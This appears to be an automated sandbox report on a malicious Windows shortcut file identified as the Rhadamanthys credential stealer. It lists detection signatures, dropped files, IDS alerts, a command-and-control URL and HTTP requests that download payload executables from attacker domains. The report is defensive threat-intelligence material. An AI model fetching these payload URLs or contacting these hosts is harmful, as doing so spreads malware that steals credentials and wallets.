Windows Analysis Report
rpQF1aDIK4.lnk

Overview

General Information

Sample name: rpQF1aDIK4.lnk
renamed because original name is a hash value
Original sample name: a83e7ec9997f8e98ae0a3e27c20430d9711215bc71591406688312f8663c7e1b.lnk
Analysis ID: 1529311
MD5: 6195bc34ba803cfe39d32856f6dc9546
SHA1: 7df2be096948fdc9590658a6e16a15250e5f4973
SHA256: a83e7ec9997f8e98ae0a3e27c20430d9711215bc71591406688312f8663c7e1b
Tags: lnkrocketdocs-loluser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
Yara detected RHADAMANTHYS Stealer
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Obfuscated command line found
Powershell creates an autostart link
Powershell drops PE file
Sets debug register (to hijack the execution of another thread)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Connects to several IPs in different countries
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (STR)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Dllhost Internet Connection
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Name Description Attribution Blogpost URLs Link
Rhadamanthys According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
 https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

AV Detection
barindex
Found malware configuration
Source: 13.3.regsvr32.exe.2964f80.1.raw.unpack Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm"}
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\ajbs50ul.bat ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\u0ow.ini ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: rpQF1aDIK4.lnk ReversingLabs: Detection: 13%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for sample
Source: rpQF1aDIK4.lnk Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49758 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49775 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.9:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.9:49954 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.9:49988 version: TLS 1.2
Source: Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000008.00000003.1531905231.000000001C640000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1531773811.000000001C580000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000008.00000003.1532489934.000000001C580000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1533339761.000000001C860000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1540794217.0000022BF7CC0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1543994680.0000022BF7FA0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000008.00000003.1531284036.000000001C770000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1530854144.000000001C580000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1537268899.0000022BF7CC0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: regsvr32.exe, 00000008.00000003.1531905231.000000001C640000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1531773811.000000001C580000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000008.00000003.1531284036.000000001C770000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1530854144.000000001C580000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1537268899.0000022BF7CC0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: win32u.pdb source: wmpshare.exe
Source: Binary string: kernelbase.pdb source: regsvr32.exe, 00000008.00000003.1532489934.000000001C580000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1533339761.000000001C860000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1540794217.0000022BF7CC0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1543994680.0000022BF7FA0000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF7177540F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError, 4_2_00007FF7177540F0
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files\Windows Media Player\wmpshare.exe Code function: 4x nop then dec esp 14_2_0000023D20D05641
Source: C:\Windows\System32\rekeywiz.exe Code function: 4x nop then dec esp 18_2_000001AADAE25641

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.9:49855
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.9:49925
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 147.45.126.71:3752 -> 192.168.2.9:49984
Source: Network traffic Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 185.196.9.174:7777 -> 192.168.2.9:49990
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.9:49989
Source: Network traffic Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 46.29.238.96:4872 -> 192.168.2.9:54350
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe Network Connect: 185.196.9.174 7777
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 13
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.9:49802 -> 130.133.110.14:33445
Source: global traffic TCP traffic: 192.168.2.9:49803 -> 194.249.212.109:33445
Source: global traffic TCP traffic: 192.168.2.9:49855 -> 147.45.126.71:3752
Source: global traffic TCP traffic: 192.168.2.9:49866 -> 104.223.122.15:3389
Source: global traffic TCP traffic: 192.168.2.9:49867 -> 51.254.84.212:33445
Source: global traffic TCP traffic: 192.168.2.9:49987 -> 46.29.238.96:4872
Source: global traffic TCP traffic: 192.168.2.9:49990 -> 185.196.9.174:7777
Source: global traffic TCP traffic: 192.168.2.9:49993 -> 185.58.206.164:33445
Source: global traffic TCP traffic: 192.168.2.9:49994 -> 195.93.190.6:33445
Source: global traffic TCP traffic: 192.168.2.9:49996 -> 95.215.44.78:3389
Source: global traffic TCP traffic: 192.168.2.9:49997 -> 163.172.136.118:3389
Source: global traffic TCP traffic: 192.168.2.9:49999 -> 37.97.185.116:33445
Source: global traffic TCP traffic: 192.168.2.9:50000 -> 80.87.193.193:3389
Source: global traffic TCP traffic: 192.168.2.9:50001 -> 46.229.52.198:33445
Source: global traffic TCP traffic: 192.168.2.9:50002 -> 85.21.144.224:33445
Source: global traffic TCP traffic: 192.168.2.9:50003 -> 37.187.122.30:3389
Source: global traffic TCP traffic: 192.168.2.9:50004 -> 205.185.116.116:33445
Source: global traffic TCP traffic: 192.168.2.9:50005 -> 198.98.51.198:3389
Source: global traffic TCP traffic: 192.168.2.9:50006 -> 104.233.104.126:33445
Source: global traffic TCP traffic: 192.168.2.9:50010 -> 148.251.23.146:2306
Source: global traffic TCP traffic: 192.168.2.9:50012 -> 193.124.186.205:33445
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /test.txt HTTP/1.1Host: 1h982d.bemostake.spaceConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1Host: bemostake.spaceConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /utox_x86.exe HTTP/1.1Host: rocketdocs.lolConnection: Keep-Alive
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.9:49925
Source: Network traffic Suricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 147.45.126.71:3752 -> 192.168.2.9:49984
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknown TCP traffic detected without corresponding DNS query: 194.249.212.109
Source: unknown TCP traffic detected without corresponding DNS query: 194.249.212.109
Source: unknown TCP traffic detected without corresponding DNS query: 194.249.212.109
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 194.249.212.109
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.126.71
Source: C:\Users\Public\ajbs50ul.bat Code function: 4_2_00007FF717747580 recv,WSAGetLastError, 4_2_00007FF717747580
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /test.txt HTTP/1.1Host: 1h982d.bemostake.spaceConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1Host: bemostake.spaceConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
